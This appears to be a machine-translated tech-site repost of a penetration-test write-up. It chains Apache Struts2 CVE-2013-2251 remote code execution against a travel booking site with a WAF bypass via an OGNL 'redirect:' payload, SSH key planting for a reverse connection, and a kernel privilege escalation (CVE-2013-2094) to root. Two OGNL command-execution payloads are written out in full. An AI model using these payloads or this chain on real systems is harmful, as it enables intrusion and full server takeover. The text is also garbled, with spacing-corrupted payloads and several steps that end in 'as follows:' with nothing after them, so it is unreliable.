Shulou(Shulou.com)06/01 Report--

How to use Struts2 loopholes to bypass the firewall to obtain Root permissions, I believe that many inexperienced people do not know what to do. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Regarding the Apache struts2 CVE-2013-2251 vulnerability, it has been widely abused because it can lead to remote code execution. The flaw works by manipulating parameters prefixed with "action:" / "redirect:" / "redirectAction:" to enable remote code execution in a framework with a Struts lower than 2.3.15. In this test, I not only bypassed the WAF firewall for remote code execution, but also exploited a Linux escalation vulnerability to gain root management control of the target server. The whole process is as follows:

The construction Payload is intercepted by WAF

First of all, when I was testing a travel booking website, I found an Apache Struts framework with vulnerabilities in its website, and also tested the vulnerability parameters of "action, redirect,redirectAction". In order to realize the vulnerability exploitation, I needed to construct an OGNL expression. I got some inspiration from this website, from which I constructed a valid Payload that executes the command "ifconfig":

Redirect:$ {# a = (new java.lang.ProcessBuilder (new java.lang.String [] {'ifconfig'})). Start (), # b=#a.getInputStream (), # c=new java.io.InputStreamReader (# b), # d=new java.io.BufferedReader (# c), # e=new char [50000], # d.read (# e), # matt=#context.get (' com.opensymphony.xwork2.dispatcher.HttpServletResponse'), # matt.getWriter (). Println (# e), # matt.getWriter (). Flush () # matt.getWriter () .close ()}

However, as expected, the above Payload was blocked by the application layer firewall on the target server and returned the following bots response page:

At this time, I always analyze the problem fundamentally. As mentioned before, "Redirect" is involved in the vulnerability parameters, and the above Payload is also constructed using the "Redirect" parameter. Let's do a Redirect test on the request of the target website and redirect the request to the hypothetical website http://www.goal.com, as follows:

Construct Payload to bypass WAF

As you can see, the final response page is a 302 jump page pointing to the hypothetical site http://www.goal.com. The above direct Payload is blocked by the firewall, but the jump here can take effect, so can the combination of the two play around a firewall? So, you have the following Payload:

Redirect: http://www.goal.com/${#a=(new java.lang.ProcessBuilder (new java.lang.String [] {'ifconfig'}). Start (), # b=#a.getInputStream (), # c=new java.io.InputStreamReader (# b), # d=new java.io.BufferedReader (# c), # e=new char [50000], # d.read (# e), # matt=#context.get (' com.opensymphony.xwork2.dispatcher.HttpServletResponse'), # matt.getWriter (). Println (# e) # matt.getWriter () .flush (), # matt.getWriter () .close ()}

The request initiated after the test is as follows:

After responding to the test, I was able to bypass the firewall and execute the ifconfig command. Haha, it's time to cheer!

Get shell by SSH

All right, next, I'm going to try to get remote administrative permissions. I tried using reverse SSH tunneling and public key authentication, which allows SSH users to log in without entering a password. To do this, I need to put the SSH public key of my hacking test server AWS into the authorization authentication list of the target server ~ /. Ssh/authorized_keys, and, in order to verify my identity and make a reverse SSH connection, I must also add the id_rsa.pub public key of the target server to my test server. The concept of public key authentication involved here can be described in public key authentication here.

Id_rsa.pub is a user identity public key, which can be added to the authorized_keys file in other hosts to implement the login behavior with that user identity. An authorized_keys is a list of public keys that are allowed to log in to a specific user on that particular server.

The first step is to get the id_rsa.pub file of the target server:

The second step is to copy the authorized_keys file to my AWS test server:

The third step is to copy the constructed authorized_keys file from my AWS test server back to the target server:

Use SSH to reverse the final connection:

Root raises the right

See, you can get remote administration privileges, but not as an root administrator. Well, for root identity rights, let's take a look at the Linux kernel version on the target server:

It is version 2.6.32. Google to see if there are any corresponding vulnerabilities. Wow, there is a corresponding system rights promotion vulnerability: https://github.com/realtalk/cve-2013-2094, and finally compile and run exploit to achieve root rights enhancement:

Well, the above is a penetration test that I implemented by exploiting the apache strut 2 vulnerability, bypassing WAF and combining a Linux rights enhancement vulnerability.

After reading the above, do you know how to use Struts2 vulnerabilities to bypass the firewall to obtain Root permissions? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.